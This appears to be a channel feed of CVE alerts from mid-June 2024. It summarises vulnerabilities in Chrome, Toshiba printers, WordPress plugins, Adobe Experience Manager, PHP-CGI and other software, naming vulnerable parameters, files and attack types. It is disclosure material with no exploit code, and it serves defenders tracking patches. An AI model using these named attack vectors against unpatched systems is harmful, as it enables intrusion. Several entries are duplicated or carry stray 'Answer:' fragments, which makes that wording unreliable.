🚨 CVE-2024-5847Use after free in PDFium in Google Chrome prior to 126.0.6478.54 allowed a remote attacker to potentially exploit heap corruption via a crafted PDF file. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2024-06-14 06:37:42 |
🚨 CVE-2024-5844Heap buffer overflow in Tab Strip in Google Chrome prior to 126.0.6478.54 allowed a remote attacker to perform an out of bounds memory read via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2024-06-14 06:37:37 |
🚨 CVE-2024-5842Use after free in Browser UI in Google Chrome prior to 126.0.6478.54 allowed a remote attacker who convinced a user to engage in specific UI gestures to perform an out of bounds memory read via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2024-06-14 06:37:36 |
🚨 CVE-2024-5839Inappropriate Implementation in Memory Allocator in Google Chrome prior to 126.0.6478.54 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2024-06-14 06:37:31 |
🚨 CVE-2024-5837Type Confusion in V8 in Google Chrome prior to 126.0.6478.54 allowed a remote attacker to potentially perform out of bounds memory access via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-06-14 06:37:30 |
🚨 CVE-2024-5834Inappropriate implementation in Dawn in Google Chrome prior to 126.0.6478.54 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-06-14 06:37:26 |
🚨 CVE-2024-5832Use after free in Dawn in Google Chrome prior to 126.0.6478.54 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-06-14 06:37:25 |
🚨 CVE-2024-5830Type Confusion in V8 in Google Chrome prior to 126.0.6478.54 allowed a remote attacker to perform an out of bounds memory write via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-06-14 06:37:24 |
🚨 CVE-2024-34055Cyrus IMAP before 3.8.3 and 3.10.x before 3.10.0-rc1 allows authenticated attackers to cause unbounded memory allocation by sending many LITERALs in a single command.🎖@cveNotify |
|
| 2024-06-14 05:37:26 |
🚨 CVE-2024-3498Attackers can then execute malicious files by enabling certain services of the printer via the web configuration page and elevate its privileges to root. As for the affected products/models/versions, see the reference URL.🎖@cveNotify |
|
| 2024-06-14 05:37:25 |
🚨 CVE-2024-3496Attackers can bypass the web login authentication process to gain access to the printer's system information and upload malicious drivers to the printer. As for the affected products/models/versions, see the reference URL.🎖@cveNotify |
|
| 2024-06-14 05:37:24 |
🚨 CVE-2024-1094The Timetics- AI-powered Appointment Booking with Visual Seat Plan and ultimate Calendar Scheduling plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the make_staff() function in all versions up to, and including, 1.0.21. This makes it possible for unauthenticated attackers to grant users staff permissions.🎖@cveNotify |
|
| 2024-06-14 04:37:58 |
🚨 CVE-2024-27168It appears that some hardcoded keys are used for authentication to internal API. Knowing these private keys may allow attackers to bypass authentication and reach administrative interfaces. As for the affected products/models/versions, see the reference URL.🎖@cveNotify |
|
| 2024-06-14 04:37:51 |
🚨 CVE-2024-27165Toshiba printers contain a suidperl binary and it has a Local Privilege Escalation vulnerability. A local attacker can get root privileges. As for the affected products/models/versions, see the reference URL.🎖@cveNotify |
|
| 2024-06-14 04:37:50 |
🚨 CVE-2024-27163Toshiba printers will display the password of the admin user in clear-text and additional passwords when sending 2 specific HTTP requests to the internal API. An attacker stealing the cookie of an admin or abusing a XSS vulnerability can recover this password in clear-text and compromise the printer. This vulnerability can be executed in combination with other vulnerabilities and difficult to execute alone. So, the CVSS score for this vulnerability alone is lower than the score listed in the "Base Score" of this vulnerability. For detail on related other vulnerabilities, please ask to the below contact point. https://www.toshibatec.com/contacts/products/ As for the affected products/models/versions, see the reference URL.🎖@cveNotify |
|
| 2024-06-14 04:37:46 |
🚨 CVE-2024-27160All the Toshiba printers contain a shell script using the same hardcoded key to encrypt logs. An attacker can decrypt the encrypted files using the hardcoded key. This vulnerability can be executed in combination with other vulnerabilities and difficult to execute alone. So, the CVSS score for this vulnerability alone is lower than the score listed in the "Base Score" of this vulnerability. For detail on related other vulnerabilities, please ask to the below contact point. https://www.toshibatec.com/contacts/products/ As for the affected products/models/versions, see the reference URL.🎖@cveNotify |
|
| 2024-06-14 04:37:45 |
🚨 CVE-2024-27158All the Toshiba printers share the same hardcoded root password. As for the affected products/models/versions, see the reference URL.🎖@cveNotify |
|
| 2024-06-14 04:37:41 |
🚨 CVE-2024-27156The session cookies, used for authentication, are stored in clear-text logs. An attacker can retrieve authentication sessions. A remote attacker can retrieve the credentials and bypass the authentication mechanism. As for the affected products/models/versions, see the reference URL.🎖@cveNotify |
|
| 2024-06-14 04:37:40 |
🚨 CVE-2023-6492The Simple Sitemap – Create a Responsive HTML Sitemap plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.5.13. This is due to missing or incorrect nonce validation in the 'admin_notices' hook found in class-settings.php. This makes it possible for unauthenticated attackers to reset the plugin options to a default state via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-06-14 03:37:43 |
🚨 CVE-2024-5843Inappropriate implementation in Downloads in Google Chrome prior to 126.0.6478.54 allowed a remote attacker to obfuscate security UI via a malicious file. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2024-06-14 03:37:36 |
🚨 CVE-2024-5841Use after free in V8 in Google Chrome prior to 126.0.6478.54 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2024-06-14 03:37:35 |
🚨 CVE-2024-5839Inappropriate Implementation in Memory Allocator in Google Chrome prior to 126.0.6478.54 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2024-06-14 03:37:34 |
🚨 CVE-2024-5838Type Confusion in V8 in Google Chrome prior to 126.0.6478.54 allowed a remote attacker to perform out of bounds memory access via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-06-14 03:37:31 |
🚨 CVE-2024-5837Type Confusion in V8 in Google Chrome prior to 126.0.6478.54 allowed a remote attacker to potentially perform out of bounds memory access via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-06-14 03:37:30 |
🚨 CVE-2024-5834Inappropriate implementation in Dawn in Google Chrome prior to 126.0.6478.54 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-06-14 03:37:29 |
🚨 CVE-2024-5833Type Confusion in V8 in Google Chrome prior to 126.0.6478.54 allowed a remote attacker to potentially perform out of bounds memory access via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-06-14 03:37:26 |
🚨 CVE-2024-5831Use after free in Dawn in Google Chrome prior to 126.0.6478.54 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-06-14 03:37:25 |
🚨 CVE-2024-35235OpenPrinting CUPS is an open source printing system for Linux and other Unix-like operating systems. In versions 2.4.8 and earlier, when starting the cupsd server with a Listen configuration item pointing to a symbolic link, the cupsd process can be caused to perform an arbitrary chmod of the provided argument, providing world-writable access to the target. Given that cupsd is often running as root, this can result in the change of permission of any user or system files to be world writable. Given the aforementioned Ubuntu AppArmor context, on such systems this vulnerability is limited to those files modifiable by the cupsd process. In that specific case it was found to be possible to turn the configuration of the Listen argument into full control over the cupsd.conf and cups-files.conf configuration files. By later setting the User and Group arguments in cups-files.conf, and printing with a printer configured by PPD with a `FoomaticRIPCommandLine` argument, arbitrary user and group (not root) command execution could be achieved, which can further be used on Ubuntu systems to achieve full root command execution. Commit ff1f8a623e090dee8a8aadf12a6a4b25efac143d contains a patch for the issue.🎖@cveNotify |
|
| 2024-06-14 03:37:24 |
🚨 CVE-2024-34055Cyrus IMAP before 3.8.3 and 3.10.x before 3.10.0-rc1 allows authenticated attackers to cause unbounded memory allocation by sending many LITERALs in a single command.🎖@cveNotify |
|
| 2024-06-14 02:37:45 |
🚨 CVE-2024-5984A vulnerability was found in itsourcecode Online Bookstore 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file book.php. The manipulation of the argument bookisbn leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-268460.🎖@cveNotify |
|
| 2024-06-14 02:37:40 |
🚨 CVE-2024-5981A vulnerability was found in itsourcecode Online House Rental System 1.0. It has been classified as critical. Affected is an unknown function of the file manage_user.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-268458 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-06-14 02:37:39 |
🚨 CVE-2023-51507Missing Authorization vulnerability in ExpressTech Quiz And Survey Master.This issue affects Quiz And Survey Master: from n/a through 8.1.16.🎖@cveNotify |
|
| 2024-06-14 01:07:39 |
🚨 CVE-2024-32896there is a possible way to bypass due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.🎖@cveNotify |
|
| 2024-06-14 01:07:38 |
🚨 CVE-2024-26169Windows Error Reporting Service Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-06-14 00:37:50 |
🚨 CVE-2023-36695Missing Authorization vulnerability in Maxime Schoeni Sublanguage.This issue affects Sublanguage: from n/a through 2.9.🎖@cveNotify |
|
| 2024-06-14 00:37:46 |
🚨 CVE-2023-36694Missing Authorization vulnerability in Bryan Lee Kingkong Board.This issue affects Kingkong Board: from n/a through 2.1.0.2.🎖@cveNotify |
|
| 2024-06-14 00:37:45 |
🚨 CVE-2023-36504Missing Authorization vulnerability in BBS e-Theme BBS e-Popup.This issue affects BBS e-Popup: from n/a through 2.4.5.🎖@cveNotify |
|
| 2024-06-14 00:37:44 |
🚨 CVE-2023-35040Missing Authorization vulnerability in SendPress SendPress Newsletters.This issue affects SendPress Newsletters: from n/a through 1.23.11.6.🎖@cveNotify |
|
| 2024-06-14 00:37:43 |
🚨 CVE-2023-29174Missing Authorization vulnerability in NervyThemes SKU Label Changer For WooCommerce.This issue affects SKU Label Changer For WooCommerce: from n/a through 3.0.🎖@cveNotify |
|
| 2024-06-13 23:37:24 |
🚨 CVE-2023-4039**DISPUTED**A failure in the -fstack-protector feature in GCC-based toolchains that target AArch64 allows an attacker to exploit an existing buffer overflow in dynamically-sized local variables in your application without this being detected. This stack-protector failure only applies to C99-style dynamically-sized local variables or those created using alloca(). The stack-protector operates as intended for statically-sized local variables.The default behavior when the stack-protector detects an overflow is to terminate your application, resulting in controlled loss of availability. An attacker who can exploit a buffer overflow without triggering the stack-protector might be able to change program flow control to cause an uncontrolled loss of availability or to go further and affect confidentiality or integrity. NOTE: The GCC project argues that this is a missed hardening bug and not a vulnerability by itself.🎖@cveNotify |
|
| 2024-06-13 22:37:32 |
🚨 CVE-2024-0089NVIDIA GPU Display Driver for Windows contains a vulnerability where the information from a previous client or another process could be disclosed. A successful exploit of this vulnerability might lead to code execution, information disclosure, or data tampering.🎖@cveNotify |
|
| 2024-06-13 22:37:25 |
🚨 CVE-2024-0084NVIDIA vGPU software for Linux contains a vulnerability in the Virtual GPU Manager, where the guest OS could execute privileged operations. A successful exploit of this vulnerability might lead to information disclosure, data tampering, escalation of privileges, and denial of service.🎖@cveNotify |
|
| 2024-06-13 22:37:24 |
🚨 CVE-2024-30037Windows Common Log File System Driver Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-06-13 20:37:26 |
🚨 CVE-2024-30058Microsoft Edge (Chromium-based) Spoofing Vulnerability🎖@cveNotify |
|
| 2024-06-13 20:37:25 |
🚨 CVE-2024-20404A vulnerability in the web-based management interface of Cisco Finesse could allow an unauthenticated, remote attacker to conduct an SSRF attack on an affected system. This vulnerability is due to insufficient validation of user-supplied input for specific HTTP requests that are sent to an affected system. An attacker could exploit this vulnerability by sending a crafted HTTP request to the affected device. A successful exploit could allow the attacker to obtain limited sensitive information for services that are associated to the affected device.🎖@cveNotify |
|
| 2024-06-13 20:37:24 |
🚨 CVE-2024-4030On Windows a directory returned by tempfile.mkdtemp() would not always have permissions set to restrict reading and writing to the temporary directory by other users, instead usually inheriting the correct permissions from the default location. Alternate configurations or users without a profile directory may not have the intended permissions.If you’re not using Windows or haven’t changed the temporary directory location then you aren’t affected by this vulnerability. On other platforms the returned directory is consistently readable and writable only by the current user.This issue was caused by Python not supporting Unix permissions on Windows. The fix adds support for Unix “700” for the mkdir function on Windows which is used by mkdtemp() to ensure the newly created directory has the proper permissions.🎖@cveNotify |
|
| 2024-06-13 19:37:36 |
🚨 CVE-2024-37635TOTOLINK A3700R V9.1.2u.6165_20211012 was discovered to contain a stack overflow via ssid in the function setWiFiBasicCfg🎖@cveNotify |
|
| 2024-06-13 19:37:32 |
🚨 CVE-2024-37634TOTOLINK A3700R V9.1.2u.6165_20211012 was discovered to contain a stack overflow via ssid in the function setWiFiEasyCfg.🎖@cveNotify |
|
| 2024-06-13 19:37:31 |
🚨 CVE-2024-37632TOTOLINK A3700R V9.1.2u.6165_20211012 was discovered to contain a stack overflow via the password parameter in function loginAuth .🎖@cveNotify |
|
| 2024-06-13 19:37:30 |
🚨 CVE-2024-36589An issue in Annonshop.app DecentralizeJustice/anonymousLocker commit 2b2b4 to ba9fd and DecentralizeJustice/anonBackend commit 57837 to cd815 was discovered to store credentials in plaintext.🎖@cveNotify |
|
| 2024-06-13 19:37:26 |
🚨 CVE-2024-36587Insecure permissions in DNSCrypt-proxy v2.0.0alpha9 to v2.1.5 allows non-privileged attackers to escalate privileges to root via overwriting the binary dnscrypt-proxy.🎖@cveNotify |
|
| 2024-06-13 19:37:25 |
🚨 CVE-2024-5459The Restaurant Menu and Food Ordering plugin for WordPress is vulnerable to unauthorized creation of data due to a missing capability check on 'add_section', 'add_menu', 'add_menu_item', and 'add_menu_page' functions in all versions up to, and including, 2.4.16. This makes it possible for authenticated attackers, with Subscriber-level access and above, to create menu sections, menus, food items, and new menu pages.🎖@cveNotify |
|
| 2024-06-13 19:37:24 |
🚨 CVE-2024-3469The GP Premium plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the message parameter in all versions up to, and including, 2.4.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-06-13 19:07:24 |
🚨 CVE-2022-22976Spring Security versions 5.5.x prior to 5.5.7, 5.6.x prior to 5.6.4, and earlier unsupported versions contain an integer overflow vulnerability. When using the BCrypt class with the maximum work factor (31), the encoder does not perform any salt rounds, due to an integer overflow error. The default settings are not affected by this CVE.🎖@cveNotify |
|
| 2024-06-13 17:37:31 |
🚨 CVE-2024-38279The affected product is vulnerable to an attacker modifying the bootloader by using custom arguments to bypass authentication and gain access to the file system and obtain password hashes.🎖@cveNotify |
|
| 2024-06-13 17:37:30 |
🚨 CVE-2024-37280A flaw was discovered in Elasticsearch, affecting document ingestion when an index template contains a dynamic field mapping of “passthrough” type. Under certain circumstances, ingesting documents in this index would cause a StackOverflow exception to be thrown and ultimately lead to a Denial of Service. Note that passthrough fields is an experimental feature.🎖@cveNotify |
|
| 2024-06-13 17:37:26 |
🚨 CVE-2024-35325A vulnerability was found in libyaml up to 0.2.5. Affected by this issue is the function yaml_event_delete of the file /src/libyaml/src/api.c. The manipulation leads to a double-free.🎖@cveNotify |
|
| 2024-06-13 17:37:25 |
🚨 CVE-2024-32504An issue was discovered in Samsung Mobile Processor and Wearable Processor Exynos 850, Exynos 1080, Exynos 2100, Exynos 1280, Exynos 1380, Exynos 1330, Exynos W920, Exynos W930. The mobile processor lacks proper length checking, which can result in an OOB (Out-of-Bounds) Write vulnerability.🎖@cveNotify |
|
| 2024-06-13 17:37:24 |
🚨 CVE-2024-31956An issue was discovered in Samsung Mobile Processor Exynos 2200, Exynos 1480, Exynos 2400. It lacks proper buffer length checking, which can result in an Out-of-Bounds Write.🎖@cveNotify |
|
| 2024-06-13 16:37:31 |
🚨 CVE-2024-37877UERANSIM before 3.2.6 allows out-of-bounds read when a RLS packet is sent to gNodeB with malformed PDU length. This occurs in function readOctetString in src/utils/octet_view.cpp and in function DecodeRlsMessage in src/lib/rls/rls_pdu.cpp🎖@cveNotify |
|
| 2024-06-13 16:37:30 |
🚨 CVE-2024-35328libyaml v0.2.5 is vulnerable to DDOS. Affected by this issue is the function yaml_parser_parse of the file /src/libyaml/src/parser.c.🎖@cveNotify |
|
| 2024-06-13 16:37:26 |
🚨 CVE-2024-22441HPE Cray Parallel Application Launch Service (PALS) is subject to an authentication bypass.🎖@cveNotify |
|
| 2024-06-13 16:37:25 |
🚨 CVE-2023-35858XPath Injection vulnerabilities in the blog and RSS functions of Modern Campus - Omni CMS 2023.1 allow a remote, unauthenticated attacker to obtain application information.🎖@cveNotify |
|
| 2024-06-13 13:37:33 |
🚨 CVE-2024-36395Verint - CWE-80: Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)🎖@cveNotify |
|
| 2024-06-13 13:37:32 |
🚨 CVE-2024-32859Dell Client Platform BIOS contains an Improper Input Validation vulnerability in an externally developed component. A high privileged attacker with local access could potentially exploit this vulnerability, leading to Code execution.🎖@cveNotify |
|
| 2024-06-13 13:37:31 |
🚨 CVE-2024-32858Dell Client Platform BIOS contains an Improper Input Validation vulnerability in an externally developed component. A high privileged attacker with local access could potentially exploit this vulnerability, leading to Code execution.🎖@cveNotify |
|
| 2024-06-13 10:37:31 |
🚨 CVE-2024-30278Media Encoder versions 23.6.5, 24.3 and earlier Answer: are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-06-13 09:37:51 |
🚨 CVE-2024-4371The CoDesigner WooCommerce Builder for Elementor – Customize Checkout, Shop, Email, Products & More plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 4.4.1 via deserialization of untrusted input from the recently_viewed_products cookie. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.🎖@cveNotify |
|
| 2024-06-13 09:37:50 |
🚨 CVE-2024-4176An Cross site scripting vulnerability in the EDR XConsole before this release allowed an attacker to potentially leverage an XSS/HTML-Injection using command line variables. A malicious threat actor could execute commands on the victim's browser for sending carefully crafted malicious links to the EDR XConsole end user.🎖@cveNotify |
|
| 2024-06-13 09:37:47 |
🚨 CVE-2024-3073The Easy WP SMTP by SendLayer – WordPress SMTP and Email Log Plugin plugin for WordPress is vulnerable to information exposure in all versions up to, and including, 2.3.0. This is due to plugin providing the SMTP password in the SMTP Password field when viewing the settings. This makes it possible for authenticated attackers, with administrative-level access and above, to view the SMTP password for the supplied server. Although this would not be useful for attackers in most cases, if an administrator account becomes compromised this could be useful information to an attacker in a limited environment.🎖@cveNotify |
|
| 2024-06-13 09:37:46 |
🚨 CVE-2024-34110Adobe Commerce versions 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 and earlier are affected by an Unrestricted Upload of File with Dangerous Type vulnerability that could result in arbitrary code execution. A high-privilege attacker could exploit this vulnerability by uploading a malicious file to the system, which could then be executed. Exploitation of this issue does not require user interaction.🎖@cveNotify |
|
| 2024-06-13 09:37:45 |
🚨 CVE-2024-34108Adobe Commerce versions 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 and earlier are affected by an Improper Input Validation vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue does not require user interaction, but admin privileges are required🎖@cveNotify |
|
| 2024-06-13 09:37:41 |
🚨 CVE-2024-34106Adobe Commerce versions 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 and earlier are affected by an Incorrect Authorization vulnerability that could result in a security feature bypass. An attacker could exploit this vulnerability to gain unauthorized access or perform actions with the privileges of another user. Exploitation of this issue does not require user interaction.🎖@cveNotify |
|
| 2024-06-13 09:37:40 |
🚨 CVE-2024-34103Adobe Commerce versions 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 and earlier are affected by an Improper Authentication vulnerability that could result in privilege escalation. An attacker could exploit this vulnerability to gain unauthorized access or elevated privileges within the application. Exploitation of this issue does not require user interaction, but attack complexity is high.🎖@cveNotify |
|
| 2024-06-13 09:37:36 |
🚨 CVE-2024-30285Audition versions 24.2, 23.6.4 and earlier are affected by a NULL Pointer Dereference vulnerability that could result in an application denial-of-service condition. An attacker could exploit this vulnerability to crash the application, leading to a denial of service. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-06-13 09:37:35 |
🚨 CVE-2024-1565The EmbedPress – Embed PDF, YouTube, Google Docs, Vimeo, Wistia Videos, Audios, Maps & Any Documents in Gutenberg & Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the PDF Widget URL in all versions up to, and including, 3.9.10 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-06-13 09:37:34 |
🚨 CVE-2024-0979The Dashboard Widgets Suite plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'tab' parameter in all versions up to, and including, 3.4.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-06-13 08:37:52 |
🚨 CVE-2024-26072Adobe Experience Manager versions 6.5.20 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. This vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser session. Exploitation of this issue typically requires user interaction, such as convincing a victim to click on a specially crafted link or to submit a form that causes the vulnerable script to execute.🎖@cveNotify |
|
| 2024-06-13 08:37:51 |
🚨 CVE-2024-26070Adobe Experience Manager versions 6.5.20 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.🎖@cveNotify |
|
| 2024-06-13 08:37:46 |
🚨 CVE-2024-26066Adobe Experience Manager versions 6.5.20 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.🎖@cveNotify |
|
| 2024-06-13 08:37:45 |
🚨 CVE-2024-26057Adobe Experience Manager versions 6.5.20 and earlier Answer: are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. This vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser session. Exploitation of this issue typically requires user interaction, such as convincing a user to click on a specially crafted link or to submit a form that triggers the malicious script.🎖@cveNotify |
|
| 2024-06-13 08:37:41 |
🚨 CVE-2024-26054Adobe Experience Manager versions 6.5.20 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.🎖@cveNotify |
|
| 2024-06-13 08:37:40 |
🚨 CVE-2024-26049Adobe Experience Manager versions 6.5.20 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.🎖@cveNotify |
|
| 2024-06-13 08:37:39 |
🚨 CVE-2024-26039Adobe Experience Manager versions 6.5.20 and earlier Answer: are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. This vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser session. Exploitation of this issue requires user interaction, such as convincing a victim to click on a specially crafted link or to submit a form that triggers the vulnerability.🎖@cveNotify |
|
| 2024-06-13 08:37:36 |
🚨 CVE-2024-26037Adobe Experience Manager versions 6.5.20 and earlier Answer: are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability. This vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser session. Exploitation of this issue typically requires user interaction, such as convincing a user to click on a specially crafted link or to submit a malicious form.🎖@cveNotify |
|
| 2024-06-13 08:37:35 |
🚨 CVE-2024-26029Adobe Experience Manager versions 6.5.20 and earlier are affected by an Improper Access Control vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to bypass security measures and gain unauthorized access. Exploitation of this issue does not require user interaction.🎖@cveNotify |
|
| 2024-06-13 08:37:34 |
🚨 CVE-2024-20769Adobe Experience Manager versions 6.5.20 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.🎖@cveNotify |
|
| 2024-06-13 07:37:25 |
🚨 CVE-2024-5265The WPBakery Visual Composer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the link attribute within the vc_single_image shortcode in all versions up to, and including, 7.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-06-13 07:37:24 |
🚨 CVE-2024-4576The component listed above contains a vulnerability that allows an attacker to traverse directories and access sensitive files, leading to unauthorized disclosure of system configuration and potentially sensitive information.🎖@cveNotify |
|
| 2024-06-13 06:37:31 |
🚨 CVE-2024-5661An issue has been identified in both XenServer 8 and Citrix Hypervisor 8.2 CU1 LTSR which may allow a malicious administrator of a guest VM to cause the host to become slow and/or unresponsive.🎖@cveNotify |
|
| 2024-06-13 06:37:30 |
🚨 CVE-2024-4145The Search & Replace WordPress plugin before 3.2.2 does not sanitize and escape a parameter before using it in a SQL statement, allowing admins to perform SQL injection attacks (such as within a multi-site network).🎖@cveNotify |
|
| 2024-06-13 06:37:26 |
🚨 CVE-2024-3032Themify Builder WordPress plugin before 7.5.8 does not validate a parameter before redirecting the user to its value, leading to an Open Redirect issue🎖@cveNotify |
|
| 2024-06-13 06:37:25 |
🚨 CVE-2024-2098The Download Manager plugin for WordPress is vulnerable to unauthorized access of data due to an improper authorization check on the 'protectMediaLibrary' function in all versions up to, and including, 3.2.89. This makes it possible for unauthenticated attackers to download password-protected files.🎖@cveNotify |
|
| 2024-06-13 06:37:24 |
🚨 CVE-2024-5894A vulnerability classified as critical was found in SourceCodester Online Eyewear Shop 1.0. This vulnerability affects unknown code of the file manage_product.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-268138 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-06-13 05:37:25 |
🚨 CVE-2024-38294ALCASAR before 3.6.1 allows email_registration_back.php remote code execution.🎖@cveNotify |
|
| 2024-06-13 05:37:24 |
🚨 CVE-2024-38293ALCASAR before 3.6.1 allows CSRF and remote code execution in activity.php.🎖@cveNotify |
|
| 2024-06-13 04:37:51 |
🚨 CVE-2024-4577In PHP versions 8.1.* before 8.1.29, 8.2.* before 8.2.20, 8.3.* before 8.3.8, when using Apache and PHP-CGI on Windows, if the system is set up to use certain code pages, Windows may use "Best-Fit" behavior to replace characters in command line given to Win32 API functions. PHP CGI module may misinterpret those characters as PHP options, which may allow a malicious user to pass options to PHP binary being run, and thus reveal the source code of scripts, run arbitrary PHP code on the server, etc.🎖@cveNotify |
|
| 2024-06-13 04:37:50 |
🚨 CVE-2024-5585In PHP versions 8.1.* before 8.1.29, 8.2.* before 8.2.20, 8.3.* before 8.3.8, the fix for CVE-2024-1874 does not work if the command name includes trailing spaces. Original issue: when using proc_open() command with array syntax, due to insufficient escaping, if the arguments of the executed command are controlled by a malicious user, the user can supply arguments that would execute arbitrary commands in Windows shell.🎖@cveNotify |
|
| 2024-06-13 04:37:46 |
🚨 CVE-2024-24549Denial of Service due to improper input validation vulnerability for HTTP/2 requests in Apache Tomcat. When processing an HTTP/2 request, if the request exceeded any of the configured limits for headers, the associated HTTP/2 stream was not reset until after all of the headers had been processed.This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.0-M16, from 10.1.0-M1 through 10.1.18, from 9.0.0-M1 through 9.0.85, from 8.5.0 through 8.5.98.Users are recommended to upgrade to version 11.0.0-M17, 10.1.19, 9.0.86 or 8.5.99 which fix the issue.🎖@cveNotify |
|
| 2024-06-13 04:37:45 |
🚨 CVE-2012-1823sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not properly handle query strings that lack an = (equals sign) character, which allows remote attackers to execute arbitrary code by placing command-line options in the query string, related to lack of skipping a certain php_getopt for the 'd' case.🎖@cveNotify |
|
| 2024-06-13 02:37:32 |
🚨 CVE-2024-3922The Dokan Pro plugin for WordPress is vulnerable to SQL Injection via the 'code' parameter in all versions up to, and including, 3.10.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.🎖@cveNotify |
|
| 2024-06-13 01:37:24 |
